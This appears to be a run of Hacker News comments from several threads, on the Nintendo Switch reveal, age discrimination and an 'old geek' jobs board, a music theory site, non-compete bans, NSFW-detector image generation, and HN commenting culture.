What I find most notable in the video is their nod to competitive-gaming / esports, which Nintendo has such a long history of shunning/disrespecting/mis-understanding. Maybe theyre finally trying to atone for the debacle around the whole Smash scene? (Then again, maybe its just the marketing people who put this video together thought that would be fun to add and have no idea about Nintendos history here.)

If they've switched to a capacitive touch screen instead of resistive then there's the potential for easily porting Unity based Mobile iOS/Android games to this.

This could be a great new marketplace for indies that make pay up front mobile games.

F2P mobile games monetization strategies rely on huge install bases that the Switch is unlikely to reach, so porting these games over may not make as much sense, but it could still be worthwhile to port to the device in order to provide more gameplay options to existing users.

I must be very out of touch with the gaming habits of millenials. The intro movie itself seemed like some nerdy wish-fulfillment. Who acts like this? Where can I meet some stunning gaming hottie like the one in the airport? Will the Switch make my life this fantastic?

My family has a Wii U, and it's connected to the only TV we really use in the house. The Wii U game pad permits pad-only play on some, but not all, games and doesn't have any capacity for multiplayer on it. I think this addresses the, "someone is taking over the TV" and, "take it outdoors" kind of use cases very nicely. Surprised they didn't play up the family aspect of it for that, but I guess that's an (only?) already-captured demographic.

Looking at the concept video it's clear that Nintendo is doubling down again on the idea of personal, physical interaction as the concept for multiplayer activities -- the "you and a friend in the living room" idea. I applaud this, but online gaming is something that Nintendo really struggles to "get" and has cultural issues with as well.

There was a an article (gamasutra maybe?) about how the N with the Wii, fundamentally had no idea what their competition was up to or understood gaming notions that had become very commonplace by that time -- like online matchmaking for gaming, etc.

However, as a gamer, I think this is definitely setting a differentiable and right path that doesn't tie Nintendo to just selling another port target for games.

I'm reminded of this old Reddit post that presages some of what's in this video:

Everyone is worried about graphics. Nintendo systems have never been about graphics. It's all about the games. They are combined two of the best selling consoles EVER. The 3D is the second highest selling console ever. The wii is fifth. The Switch brings both of them together. You can experience the awesome Nintendo literally anywhere at anytime. You can't get that with any other console. Now they are bring in major titles and giving us multiple good controllers for when they are needed. That's fucking awesome. I was about to buy the PS4 Pro edition, but fuck that I'm waiting for this. I'm hoping they still alway 3DS controllers to connect to the console so I can play with my 3DS friends with the portable device and the dock.

I often wonder whether it would be a good idea for Apple to acquire Nintendo, and have them focus on building phenomenal gaming experiences on the iOS platform through focusing on software and device accessories (e.g. controllers). For some reason Apple and Nintendo in my head feel like they share important DNA traits.

I read somewhere it seems the Switch won't be region locked which is very interesting. I wonder if Nintendo is cutting the initial 3rd party devs a deal on the new cartridges then (considering they'll likely be still more expensive than your standard Bluray DVD).

Skyrim was released almost 5 years ago, yet an updated version of it is used to advertise the capabilities of a next-generation console. It's really disappointing to see the amount of recycling in entertainment in the past 10 years. More disappointing that people eat it up.

Also, the entire selling point is being mobile crossover. That seems like a great secondary feature, but alone... that's it? Where is the imagination that brought us the Wii?

I can only hope Nintendo attracts enough development to make interesting (perhaps Pokemon Go-influenced) unique crossover use cases, beyond just playing the same game the same way on a TV and at the airport.

No touch controls or motion controls in sight! I think they'd ultimately be incompatible with this anyway.

You can't have good local portable multiplayer if one player always has their fingers on the screen, blocking the other's view.

Motion would be very haphazard, due to all the usage styles. Where would the motion sensors go? If it's part of the tablet, you can't play while docked to your TV. If it's part of the joycons, you'd probably have to remove them to play some games, which would be again annoying if it's docked. If the pro controller has motion controls as well, some games requiring both joycons wouldn't bother using it. You'd have to have at least 4 sets of motion controls across the parts for it to work ubiquitously.

All in all, it makes a lot of sense that we might not see those 2 clunky features returning, which is great.

But all the bits (dock, tablet, 2 joycons, joycon mounting stump, pro controller) is a bit too clap-trap for me. I had used Wii Fit for a while on someone else's Wii and liked it, so I got a Wii U version. The addition of the touchscreen plus wiimotes in the Wii U made it a mess of always picking up and putting down things, which was super annoying. Having fewer input schemes, and using them well, would be preferable, in my opinion.

This looks like a very well designed console and I appreciate that Nintendo takes chances does try to offer something different with each console release.

The crucial element that is going to determine whether I purchase this or not is will it support location-based gaming? Touchscreens, gyros, and cameras aren't necessary, but location based-gaming and the spontaneous, real-world social interactions it generates was the only reason I played Pokemon GO. I do understand that designing games with this in mind and making it fun for all players is a difficult if not impossible problem to solve for those who don't live in dense urban areas

I'm also disappointed that Nintendo isn't developing for VR yet. While I respect them for not following the herd, if any developer is going to lay the foundational design patterns for VR gaming, it's Nintendo. Mario 64 and Zelda: Ocarina of time did this for 3D.

This is a good idea and seems well-executed. While still essentially a gimmick, the portability is a much better and more useful gimmick than the Wii's motion controls or the Wii U's touchscreen controller. It seems to get in the way of gaming much less than those did.

Unfortunately, while it's a rather good gimmick, it seems like Nintendo is repeating its usual mistake of sacrificing gaming power for it. Releasing a device with a 720p screen in 2016 is almost as bad as releasing a device with a 400x240 screen in 2011, in my opinion.

Nintendo has a very bad habit of making devices that compete with the previous generation of its competitors' devices instead of the next one.

I dunno... I never play games except at home now, so there's nothing interesting here for me. It's just gonna come down to whether I want to play Smash / Mario Kart / Mario, like it pretty much has since the GameCube.

I pretty much doubt the graphics quality could be that nice as shown in the demo while maintaining excellent battery power. Guess the final graphics won't be that much better than PS Vita. Still, looks like a really exciting concept so am really looking forward to the release and would like to see how it goes.

Anybody have any info on how the Switch will be backwards compatible with Wii U discs (i.e. a portable drive perhaps), and 3DS cartridges? I have a stack of Wii U games that hopefully will still be playable.

Is it like a Wii U flipped? It's awfully resemble Gamevice controller for iPad - https://gamevice.com - except it's also an iPad, which is as big as 12 inches! How does Switch gets its content, by download, or old-fashion cartridge (I'm totally cool with that). And lastly, the battery lasts how long??

This actually looks amazing. I haven't bought a game console in a while and have in fact been actively avoiding them in favor of PC gaming and Steam, especially now that we've got the Steam Link and Steam Controller. However, this has enough value add that I could totally see myself buying this. This might just be the best thing I've seen from Nintendo in a long time.

I personally feel this is going to be mediocre at best:1. Limited appealing to main stream consumers2. Awkward physical spec, tablet's down fall pretty much proved that how big a mobile device should be3. No one would want to write games for this...

I wonder if the Tegra X2 in here would be at all able to use any other nintendo devices as an external gpu since they no include the pascal architecture. For example possibly using the new nintendo nx with the switch somehow. Just a thought.

I didn't get it... is it a handheld or a phone/tablet device? my question whatever it would replace my phone or just be another device on my backpack like the iPad, Laptop and tons of extra chargers, i carry to almost everywhere?

Does anyone else think the controller stick on the right looks like a problem? I can't help thinking that I will keep bumping the analog stick if I attempt to use my thumb to press the buttons at the top.

What happens if multiple people from the same household want to use local multiplayer on different screens? That's the only case where the one-to-one relationship between console and portable screen breaks down.

Can I interpret that as "we missed the holiday season, and pre-announce this because we think its Osborne-effect (https://en.wikipedia.org/wiki/Osborne_effect) will be smaller than its effect on the sales numbers of our competitors?

Seems like it will be a challenge to build games that are compelling on both a large screen while seated in your living room and on a small screen when you're out and about (from both a UX and gameplay perspective).

With that said it's a smart move to use the same controller for both use cases.

It's interesting to me to watch a video about a new gaming platform and have that video show me all the ways in which said platform will destroy nearly all forms of real human interaction with others, reducing us to unthinking drones looking at screens moving little virtual characters around while our brains whittle away.

This is the problem with the gaming industry. It's the equivalent of very smart engineers using their skills on the web to find ever more effective ways to make people click on ads. It's such a waste of human talent.

Gaming is different but not really. Most of the popular games have no real redeeming qualities. They are black holes into which youth can get sucked into, burn hours, days and years and, in extreme cases, ruin their lives. This, I think, is despicable.

If you want to do well in gaming you have to use your skills to find ways to create addictive games that shift a person into a Pavlovian state where they want more, they keep clicking the buttons and, eventually, they send you money. This has certainly been proven by the iOS space. Games like "Clash of Clans" is one of many examples of this.

Getting truly creative to find ways for people to engage with more intelligent and useful activities is very, very difficult. And so, to usurp part of a phrase that paints an amazing image...when they go low, we go lower.

I have long been disenchanted with what the gaming industry has done to kids. It's making money at the expense of their brains and emotions. It's selling drugs in digital form.

I didn't used to think this way until I saw the effect on my own kids. To make a long story short, my two little ones started to lie to us and play a couple of these addictive games on their iPods.

We have a simple rule at our house: On Saturday's you can play the available games for a couple of hours. The rest of the week play with legos, go outside, play with the dogs, etc.

This worked very well for many years (almost 18 to be precise). In fact, in a lot of cases they'd play less than two hours because they'd get sick of it and prefer to go for physical play.

Until a couple of games surfaced. And they, like evolved bacteria, became immune to the mechanism that made my kids decide to stop playing. Soon we would discover them playing the games in secret under their blankets at 11 at night instead of sleeping. Warnings did not work. And, after a couple of them we took the iPads and iPods away. They had become destructive devices rather than the opposite.

My kids were lying to me in a manner which I would imagine was no different than kids lying about taking drugs.

They've been off the iOS devices and these games for a year. They get their devices back in January. Cleared of all the addictive games. We'll see what happens.

So, yeah, I look at a video like the one for the Switch and immediately imagine how many lives it will destroy if used as portrayed.

Oh my god, a sane name for once. It was really getting out of hand with the DS and Wii when the same name referred to several different generations of hardware in a non obvious way. (DS, DS Lite, 3DS, 2DS, New 3DS, try making heads or tails of that).

So instead of a portable screen/controller like the WiiU that's separate from the main machine - the main machine IS the portable part that could easily be dropped/broken, now? Or am I missing something?

Why not create a VR/AR console hybrid that lets you create things at home and then experience them in the real world... digitally graffiti your town at home then go out and check out your art work and or messages? Maybe that's an app already... leave your friends messages in certain locations seen via an AR app?

Can you do another good deed and require your posters to include salary range in their job ads?

It's the norm in the UK and we successfully forced this in Poland (though posters almost NEVER post salaries here). How? The companies need IT staff so much that almost all IT job boards (at least the most popular ones - like FB groups or https://nofluffjobs.com) started requiring the salary range.

I think your idea is praiseworthy, but I'd never ever create a website like this with hidden salaries. Especially in your case - it's so cool people post jobs on your board, but what if they do so, because they're offering 10, 20, 40% less because it's a place for "old geeks that noone wants"?

I'm really super proud that if a IT ad in Poland has no salary range most of us just ignore it. And it took us maybe 2 years to get to this place. I think every other country should follow the lead and end the "competitive salary" trend. I don't want to spend 3 days on interviews just to discover that the salary offered is way too low for me. Salary missing from an ad is a big lack of respect, the sooner people realize that the better.

Here's the deal: Employers will exploit your age no matter how old you are. There is no "perfect age" for a developer. When you're young, they exploit you because you are inexperienced (especially at negotiation). When you are "old" they exploit by trying to play the age card. "Not a cultural fit"--LOL--fix your stupid culture and stop exploiting people, you smug fools!

So what is there? A ten year "ripe" age range where you're good enough to code but don't have a wife and kids? Blatant exploitation of human capital.

As far as "moving up to management" that's a load of crap. There aren't enough management positions to soak up all the age 35+ developers out there. It's an extremely narrow funnel. For the winners of that race, the prize is a lifetime of quiet suffering: You'll be lucky if you retire without major depression, anxiety, heart problems, or all three. I wonder what the mortality statistics are for people who work as IT managers?

There is also this role called "architect." Do not be enticed. It is, at best, a torturous role, and at worst, it's a redundant role that people who were only so-so at coding get promoted to so they can no longer annoy the rest of the team. The effectiveness of any given architect has an exponential decay from the instant they stop coding and start attending meetings all day.

Basically, you either keep coding and stay relevant or you go do something else completely. The rest is bs. But don't for a second imagine that companies aren't exploiting you by making you uneasy about your age or whatever else can be thrown in front of you to try and confuse, diminish, and lowball you.

I wish folks like Bray had championed this cause 20 years ago. It may not have done much, but... it feels a bit weird to hear old people complain about discriminatory impact. I can't say he was a contributing factor to the ongoing 'youth culture', but... it wasn't hard to see this coming.

My situation may be somewhat unique, in that I've had grey hair since I was 18. Not a HUGE amount at 18, but... people noticed. By the time I was in my mid 20s, it was definitely noticeable - more pepper than salt still, but noticeable. By 30... there's a fair amount of grey showing. Early 30s I've got people thinking I look good for being in my late 40s (had that more than a couple times).

But when it came to interviewing and opportunities, I was already feeling the age stigma in my late 20s. "Not a cultural fit" - not even in silicon valley mind you.

Had someone interviewing me - early 30s - said "well your resume only goes back about 12 years or so, what were you doing before that?" "High school". "Whoah..." - later found out he's assumed I was mid 40s.

Could I dye my hair? Yeah, but.. it's a pain, and... other parts of me will get old too. Not worth it - want to get hired based on ability, etc.

What's sad is to hear about the mid 30s folks wanting to get plastic surgery to look younger, which just validates and perpetuates the continuous youth culture. May not be possible to fight it at the Facebooks and Googles of the world, but it shouldn't be this bad...

I thought I was on medium.com.. You need to add a call to action to the end of your post! Add a short line - "if you've experienced ageism checkout these job listsing at /link" or "to see what I built visit /link" or something similar. Lots of lazy people want to click a link at the end of your post to see your site rather than trying to find a link in your profile or scrolling all the way to the top. Plus when someone inevitably copies your content, you get a free link.

I thought I was hot shit when I had 5 years under my belt, too, just like those whipper snappers. Took another 10 to recognize how full of shit that idea was.

I think there's a certain niche that wants to hire experienced, disciplined and reliable "old" geeks like you (or actual old guys like me...still grinding code at 50). Looks like you're going to own it. Well played.

It sounds like everything worked out perfectly for the author on that fateful day. What are the odds that a stranger saw the author's initial (unsuccessful) post in the HN 'new' section and decided to write a whole article about it, post it to HN (with a link to the original form) and that this new post made it to the front page... Then it crashed... But thankfully there was an HN moderator on that day who cared enough to edit the link to send users directly to this form.

It sounds like the author made the most of it though, so I guess it's well deserved.

Woah - did I miss the announcement that old is now 35 and above? Given the working range of professional engineers in the SF field, it sad that its not easier to invert the problem and build a Young-Fun-and-Full-of-Recent-Academic-Course-Material-Jobs.com.

I hadn't seen this site before, and I think it's a great idea. Though I'm young, I am certainly terrified about the trend of age discrimination in the valley - after all, we all age! I'm glad to folks trying to make a meaningful difference in the trend. Perhaps through good samaritans such as OP, those same twenty-somethings that reject so many qualified applicants on account of age will receive better treatment when they themselves reach 35 or 40.

spent an hour putting up a Google form and static site on a cheap Digital Ocean instance.

Now I feel like the Old Geek (I'm 32):

What's the deal with Digital Ocean? If the website is static and receives content by manual copy-pasting from a Google sheet (as outlined in the article), why bother with Droplets and Storage and all the other configuration? Why is good old web hosting (the kind where you just upload your html/php/js via FTP and it all just works) not good enough for this? Really curious.

I really like how the author posted the fake pricetag before spending time implementing payment processing - easy way to verify people will pay for it, low cost of experimentation. I've heard of other companies using similar strategies like a/b testing features that don't exist yet to figure out what they should build next.

I just joined a new company and I feel a little reverse-ageism from my part. My team and most of the company employees are at a younger point in their life. After leaving a company where I could talk to people about kids the same age as mine and such, I find it all a little unnerving and uncomfortable. They've been fine and I imagine once I've been there awhile it will be ok, as I still have people outside of work to talk to, but it will take a little getting used to.

I wonder if the problem is specific to ageism in individual contributor roles. I've worked at a few startups where maybe 1/3 of the product team was over 40, but I can only think of two coworkers over 40 who didn't have any direct reports. Do we find ourselves wondering why an individual hasn't "advanced" to a management position after 10+ years?

Congratulations on seeing the opportunity and quickly moving to do something about it. It is unique enough at first sight that you got early coverage in the press, which is very helpful.

Quick question: I did not see anything unique to "old geek" in the website, other than the URL of course. I guess it is an implicit assumption by both job seekers as well as job posters.

On that note, where would this concept be headed if other job sites added a simple attribute called age (or something similar but more palatable) where job posters could specify their preferred age range, and job seekers could search on it?

Sir, a fine website, one that I cannot take advantage of because I am in Australia. However a minor point - I do have some difficulty seeing the pale green highlight around the positions, I believe it may be to do with my red/green colourblindness, common amongst men, it is almost impossible to see against the bold blue. If you are feeling creative maybe you can change the colour of the highlight to a different less pale green or another colour. Thanks again for your site and congrats on your success. Cheers.

What I really like about this is how the interface is so dead simple. It could be the Craigslist of job postings with the $50 barrier to entry to filter out shitty posts. My advice is to not overdo it with features and KISS.

Great site! And thanks for taking my feedback in stride about the "tell people you heard it on oldgeekjobs.com" not being appropriate for the scraped jobs! The change (along with prioritizing paid ones) looks great!

On one hand, I'm getting older. On the other, my skills are getting better. The younger people I work with can't keep pace with me. And, my employers aren't unaware of the fact that it indeed is a zero-sum game, so my age (early 40ies) has never been an issue so far. I believe there're and will be many employers who look at nothing but what you bring to the table. As a businessman, you wouldn't be foolish enough to hire only noobs.

Idea to make even more money (if you get billionaire on it, please make me a millionaire also :) ): there are services that post jobs to multiple job boards. Create an API they could hook your site in easily and offer them a 20$ discount, so they can offer your service to their customers for 40$ and can also win a 10$/job posted to you.

Examples of such sites that come to mind are ziprecruiter.com and broadbean.com

That early "Hacker News Effect" really got you off to a roll, and you made the most of it. Have you ever thought what would have happened if that Wordpress write-up was not created, or didn't get such a good response on HN?

If there's an insistance on a fixed-width font for the site, I really wish it was something more like Consolas/Inconsolata etc... The job descriptions are nearly unreadable on my display, lighter gray, with a relatively thin font weight.

If someone wants to try music, start with playing an instrument and then pick the theory. If in physics theory says how the world works, music theory is mostly about labeling things that sound good vs noise. And it's hard to get the words without playing first.

I like this! I've always wanted to build a music theory textbook (like Laitz) where the examples could be played.

> When a song says that it is in the key of C Major, or D Minor, or A Harmonic, etc. this is simply telling you which of the 12 notes are used in this song.

Small nitpick, this is not accurate, C Major and A (natural) Minor have the same notes but different starting notes so they are different scales, and pieces written in them sound different from each other. It's one of those things that's slightly hard to explain if you don't sing/compose/play an instrument/read music but very obvious if you do.

One thing that I don't see in it, but that I find fascinating, is that in western music each half step represents a ratio of the twelfth-root of two, in terms of frequency. That way 12 half steps (an octave) will double the frequency.

Certain notes within this are close, but not exactly, on a "simple ratio". It's just coincidental that it works out pretty good. (although you could make it work out just as good with something other than a 12 step scale....a 19-step scale has been used: https://en.wikipedia.org/wiki/19_equal_temperament )

Anyway, I think that would fit in well with what you've done so far, but obviously, explained in the nice simple graphics that you seem very good at.

I also must say I love the way you use color, I have a music project of my own (that I'm hoping to debut very soon) that also uses color in a very similar way. Did you know that Isaac Newton fixated on 7 colors (ROYGBIV) because he thought there was a connection between the diatonic scale and colors? That's why indigo seems to have been promoted from some obscure color to one of the "basic" colors of the rainbow. (I prefer BOYGBPP, red-orange-yellow-green-blue-purple-pink)

I'm kind of late to the game in this thread, but my thought about theory is that it should start with physiology and technology. At each level we're reminded that we study the aspects of music that people have already invented, and that we may overlook a lot of important things, such as rhythm.

Physiology: Some of this may be speculative, but it seems likely that "harmonious" intervals, that have a superposition of harmonics, have a physiological effect.

Technology: The 12 tone scale could be described as a technology for tuning an instrument with harmonious intervals. Temperament is a technology for solving the problems of tuning primarily keyboard instruments.

Naturally, math is involved in understanding these things, as with many areas of science and technology.

I would talk about a handful of widely used instruments, such as keyboards, strings, winds, guitars, and drums.

Then you can begin to talk about scales, chords, melody, form, and so forth.

I wish this was even more "from first principles." I wish the "harmony" section would point out that the "simple ratios" they initially show both have powers of two in their denominators, and thus are just octave adjustments of the harmonic series. I wish the "chords" section would derive the major triad as the fundamental frequency combined with the first two (non-octave) frequencies in the harmonic series octave-adjusted down to be close to the fundamental.

There's not a smidgen of principle in the jump from harmonic ratios to tempered tuning and standard scales and chords.

True first-principles music theory must (A) focus primarily on psychology over physics (B) not tell people that complex ratios sound bad but simply help people notice that they are different from simple ratios (C) actually go through the full logic of how the tempered system is derived from chains of harmonic ratios adjusted to temper out commas. The easiest approach to the latter is to simply teach diatonic scales as harmonic ratios and not introduce temperament at all until much later.

Anyway, I'd write the ultimate thing if I ever found the time. There's at least some good elements to this attempt so far. It really needs to be licensed CC-BY-SA though so that people can adapt and contribute and improve to get it to where it's really good.

Interesting, but too bad it's not much more than the basics. I struggle to find a good explanation of how harmony works, i.e. what they mean by the terms "resolution" or how chords are made, in short: how a musical piece is built.

My piano teacher's refusal to explain these to me is one of the reasons I lost interest in the instrument

Great idea! Just FYI I'm noticing a fair bit of static when playing the various tones. It's mostly at the beginning, which makes me think it's just due to the discontinuity at the beginning (maybe start the volume at zero and quickly increase?) But I'm getting blips of static in the middle of most tones as well, so there must be something else going on. Tried both Chrome and Firefox. I suppose this could be an artifact from my onboard sound card or something like that, but I haven't noticed anything similar elsewhere.

Well done! It summarizes a lot of theory it took me months to puzzle out on my own.

One nit: At the top of each section there is a section title, at the bottom of each section, there is a "Next section" title, a description, and a next section button, and on the side there is a list of sections. Some of the titles are inconsistent from list to top of current and from bottom of current to top of next. It's a little confusing right now, and there are only a few sections; when there are more, it will be far more confusing. I don't have a suggestion as to how fix it, just pointing out the confusing inconsistency.

This is the perfect minimalist introduction to music theory. A similarly good explanation is in Daniel Levitin's "This is Your Brain on Music". It's first few chapters explain music theory to beginners in a really elegant way.

This is great! I found the more robust examples really useful, like the ones that show notes and triads in a key. I'd love to have something like this in the form of a VST or something usable in Ableton.

this is great but I there was recently an article that made the rounds on HN pointing out that what sounds 'Nice' to people not exposed to western music is very different from what sounds 'Nice' to westerners. This is a great site and people can learn a ton but its very western centric and it might be worth pointing that out early on.

I don't understand why there's so many people in the comments defending non-competes. They have literally no value to society, or to individual employees. They are a tool of restrictive coercion to stifle an employees freedom of movement in the job market.

The only thing a non-compete does is say that Employee A cannot work in their chosen field for some period of time after they are fired or quit. In doing so it offers no consideration or compensation typically in the contract.

So your employer underpays you by 40% and treats you badly? You want to leave for greener pastures at that hip new startup that offered you a Senior Engineer gig? Well, sorry to say you have a mortgage, a wife, and 2 kids and that non-compete says you are only legally allowed to be a burger flipper for two years after quitting, that software engineering is verboten.

Totally fair right?

If you don't sit on the board of a Fortune 500 company, you have literally no incentive to support non-competes. There is no rational basis to argue in their favor. Please learn the difference between NDAs, IP assignment agreements, and non-competes before lending non-competes some mystical powers they don't have.

Note that this is being proposed as something states should do. Federal legislation is not being proposed. Worst case would be Federal legislation which was weak and pre-empted state legislation, weakening California's ban.

California employment law prohibits non-compete agreements for employees, and has since 1872. California also prohibits any employee agreement which claims employer ownership of intellectual property developed on the employee's own time.[1] This is one reason Silicon Valley is so successful.

Non-competes, the most anti-innovation, anti-skilled worker, anti-free market, anti-business and anti-American thing in working today. Non-competes are protectionism for larger businesses over small/medium businesses.

As a freelancer, contractor and self-employed business owner/worker, please make these illegal, tired of these.

The worst part about non-competes is they are blanket protectionism usually and up to 2+ years of non-compete, this sometimes happens on a job that is only 1-3 months. You have to laugh at those types of situations. Usually the client will push them aside or lower the time to the job plus some time, but both non-competes and arbitration agreements are horrible for workers in today's economy where people change jobs frequently and many are self-employed/freelancing/contracting.

The non-compete should not exist, at the core removing competition from skilled workers in our economy is bad all around, unless you are one of the current big fish.

I'm not sure if you came here for anecdotes, but my very first full time web developer position had a non-compete clause. After 2.5 years, I moved to a new company about 15 miles away for a roughly 20% raise. Some time into this job, I ended up doing some work for a client that had left my previous employer. I reached out to the previous employer because I needed something changed on the server (they still managed hosting) - this tipped them off that I was (gasp) doing work for one of their previous clients. They ended up attempting to sue me and my new employer based on the non-compete! We went to a disposition, but then the lawyers huddled, and the end result was that the non-compete was reduced from 5 Years (!!) to just 1 year, and that we agreed I wouldn't do work on that specific client for the duration. Otherwise, there was no penalty or fallout. I consider it a big dramatic show with no benefit to the previous employer; they stomped their feet and pouted, the end.

Depending on the phrasing of the non-compete, I tend to cross that section out, initial them, and then include a note when I submit them to my employer. Most are fine with that change.

Today, after completing almost a month of my trial at a new job, HR asked me to sign a document on Stamp paper with a very vague 1 year non-compete clause. All my objections to the same were casually shrugged of by her, by saying they don't use it until I would directly hurt the revenue of the employer.

When I refused to sign it she said that it might be hard to offer me a job in the case I don't sign it. Which very much sounded like a threat to me. If they insist I would most probably sign it, as without the salary I wouldn't be able to afford rent next month. According to her all the other employees have signed it and none questioned her on it.

Notably non-competes are mostly illegal in India, still almost all agreements I have come across have the clause mentioned in them. I don't understand the point in having a clause like this, when its non-enforceable.

Many other points of the agreement were as egregious as the non-compete clause. Also the whole agreement was extremely one sided. It also said all the IP/Products/patents I develop, even in my own time, during my tenure would belong by the employer.

I don't understand how these clauses are even legal at first place. It violates the basic right of freedom of work. You can't have on one end freedom of enterprise but on the other hand no freedom of work for employees. the worst thing is the fact that these agreements usually come with 0 compensation.

Why can't congress do something about this? Non-competes are clearly terrible for workers, and should at the least be illegal without a severance agreement. If a company wants to keep me from working they should pay for the privilege. Workers also need to start refusing to sign egregiously bad non-compete agreements.

I just signed one of these ridiculous clauses because pretty much everyone is just slapping this into their contracts now.

Law needs to catch up on this one and fast. I like the idea of making non-compete enforceable only if you can prove malicious intent. Similar to how tax works. If onus is on the tax payer to prove that if you buy something and sell it at profit you must prove that the _intention_ was not to turn a profit if you want to pay capital gains tax and not income tax on the profit.

Except the burden on proof must be skewed in favor of the employee and the proof of intent needs to sit with the employer if they want to enforce. E.g. If I go to market and get an offer (say at some competitor), you have first right of refusal to give me a counter. If you refuse to counter you cannot enforce your non-compete. This is fair imho. Lots of problems regarding "trade secrets" etc. but the law should be highly weighted towards the idea of "innocent by until proven guilty" for the employee.

This comes one week after - and in contrast to - Donald Trump promising in his first 100 days in office a five-year ban on White House officials and Congressman from becoming lobbyists, and a lifetime ban on White House lobbyists from lobbying on behalf of foreign governments.

What is most surprising to me about these stories today is how uncommon NDAs are. I read somewhere that 20% of workers in the US have signed one.

I don't know if this is a common experience, but my employer recently began putting NDAs in place and, in retrospect, I feel they took advantage of the ignorance of most of the employees (including me). They insisted that the NDA was "standard," managers told us that there was no room for negotiation and pushed to have us sign immediately (eventually relented to having it signed by end of the following day).

This seems to miss how companies will react if enacted. If there's a freer flow on the talent side, corporations will want a freer flow as well. I would expect this to accelerate the current trend of converting more and more positions to contract or temporary positions rather than employment.

A ban seems heavy-handed. Since a noncompete essentially ties up an employee for a period, I'd prefer to see that tie-up treated by law as a continuation of employment at the existing salary. Surely companies must value their precious IP more than a single employee's salary for a year or two and if they don't, perhaps it isn't that valuable after all.

> The Obama administration on Tuesday also urged states to ban non-compete agreements that are not proposed before a job offer or promotion is accepted and said employers should not be able to enforce the agreements when workers are laid off.

Won't this just move the non-compete to be included in the job offer instead of the formal employment contract? That's a slight improvement at best.

I like how anyone even mentioning IP is downvoted to hell. It really shows you what market Ycombinator is really in. Every single comment is either someone's personal narrative, or a ridiculous troll where "OMG WHY" is the only thing they say in each sentence. Wow, I wonder how this ever became law when YCombinator commentators are so opposed to it?

On one hand everyone is free to trade freedoms for gains (usually monetary - every contract restricts both parties freedom), but on the other hand you can't trade certain freedoms away that we view as fundamental.

Even though I am certainly no proponent of non-compete agreements I cautiously tend towards viewing such contracts as acceptable and valid.

You usually do limit selling your services already the moment you accept a position as an employee, at least for the time you stay employed there. Contractually expanding it for a mutually agreed upon period doesn't strike me as that much different, at least as long as there was no coercion involved and both sides fully understood the consequences.

It's mesmerizing to see this NSFW detection applied in reverse, and it's even more interesting to observe your mind react to the generated images. You can see the sort-of-mons pubis patterns, the maybe-pubic hair, the perhaps-breasts and the suspiciously phallic appendages, complete with realistic colors.

Interestingly, all exposed skin suggests that the training dataset for the NSFW detection was skewed towards caucasians, given how the synthesized images are near-completely devoid of skin tones other than light pink. Perhaps this is a good visual indication of unintentional 'bias' in datasets?

Some of these images and those from similar projects could be in an art gallery. They are art; provoking original, emotional, responses.

Most people hear about self-driving cars, but not about the fact that machines have already begun to emulate human creativity in the most intimate way. For a while, this secret assault on our uniqueness will stay among us.

I am always blown away by how eerily similar these generated NN images are to the visuals experienced under psychedelic drugs. Moreso than any artist's depiction (and there have been plenty of those)... they just have the same "feel". Which of course leads one to the inescapable idea that there is a fundamental relationship here.

Some of the more abstract images at the beginning really remind me of Beksiski's paintings. (some NSFW, but good, dark art overall) https://art.vniz.net/en/beksinski/ There's just enough of abstract ideas and randomly included genitalia.

(now I really wish someone did a Beksiski + photos mixer... there's ~240 samples just on that site)

They have automated the surrealist movement. Which goes pretty much directly against the philosophy underlying the surrealist movement. Which the actual people involved with it would probably approve of, as they mostly all moved on from it anyway.

Has anyone ever thought about using all of reddits porn subs for machine learning? There must be 10s (or even 100s) of thousand of images (kind of) neatly organized by gender, boob size, ass size, skin color, age, ...

If the author is reading this, per se means by itself, on its own. I'm not reading per say in its stead for the first time today.

It shouldn't be surprising that many misheard words survived in a time when there was no widespread frequent exchange of written language and no writing standards or before that, when hardly anyone could even read. I feel this severely complicated our languages.

This is slightly on topic as well, because Natural Language processing has to deal with that now.

going one step further with the nitpicking, just because I am at it, the per-say (or indeed, per se) is only a filler in that sentence, like really or very often are, really though.

It seems possible to put other, not-porn images of people into the hopper and spit out an endless stream of perturbing, semi-pornographic trolling. That will probably happen, despite it being an awful idea, and it could even become commodified.

I'm a very average HN commenter. I do put in effort in writing here, trying to be civil above all and sharing my experience where it could be of interest. But I'm not Alan Kay, I've never rewritten a distributed deep learning system in Haskell using a genetically optimized Paxos consensus protocol, and my entrepreneurial experience is a loose string of "don't do this" case studies at best... So my comments certainly won't make anyone's "Best of HN" list.

To my surprise, the post has 28,000 views and 755 recommends so far. If I had written it as a HN comment, it would have got maybe 5-10 upvotes and perhaps spawned a short discussion thread about how unrealistic my idea was. (Please don't bother to criticize the content of the blog post in replies here -- I'm just using it as an example of blog vs. comment.)

I love reading HN discussions... But maybe there could be a site that slots between the HN and Medium formats, and lets you expand your comment into a blog post with minimal friction? Call it "HN Long-Form" or whatever. Ideally it would interface with the HN comment system so that you could mark your comment with something like "Promote to long-form" after you've written it. That would create an editable post on the long-form site. You could then later expand your comment there, and publish it on the long-form comment aggregator site. (Maybe I should just build this myself and see if it feels right.)

On second read, I'm not sure I agree with the first paragraphs of Dan's post at all. He seems to be saying that HN is terrible, but a handful of comments from star posters rise above the muck. I just don't think that's fair.

Yes, the clich is that HN is a place full of mean, entitled semi-autists who will criticize your site's CSS whitespace formatting when you ask for business feedback... And of course there's a grain of truth to that (persistent stereotypes usually don't come out of thin air), but it misses the mark on two dimensions.

The first is that the criticism you get on HN is no worse than what other aspiring creative professionals suffer. I went to an art and design college, and the critique you'd get from students and even teachers was 99% of the time harsher than the HN style, yet no more guaranteed to be useful.

Consider a first-time novelist who spent years on a book. One day it gets critiqued in a newspaper. The professional critic might find that the author has a clumsy style, poor research, paper-thin characters, and seems to lack the life experience to even write about the topic. What do you do after that kind of criticism? You suck it up and go back to work on the next novel.

Making use of feedback is all about filtering and reducing multiple sources into something actionable. Nobody is right all the time. Your parents were wrong. Your teachers were wrong. Your peers were wrong. Your professors were wrong. Your boss was wrong. Your cofounders were wrong. Your investors were wrong. HN commenters were wrong. Still it's worth taking in all these inputs as much as you can.

The other dimension of HN comments is that they can be surprisingly deep. When an arts or culture topic makes it to the front page, it seems like someone comes out of the woods with the perfect personal anecdote. Whether it's Mondrian, Messiaen or Modiano, there's always someone on HN who happens to have a passion for it.

HN comments are underrated, but it's not just because of star power: it's everyone's contributions that make it consistently worthwhile for me.

When I worked with the HN post data, I noticed that some years ago HN users had correctly predicted the "Show HN" projects that later got funding. Those projects had more upvotes.

The more recent data has no such connection. It seems that the influx of users reduced the quality of judgement.

So one way to improve HN submissions and comments is to weight points by the user's tenure on HN.

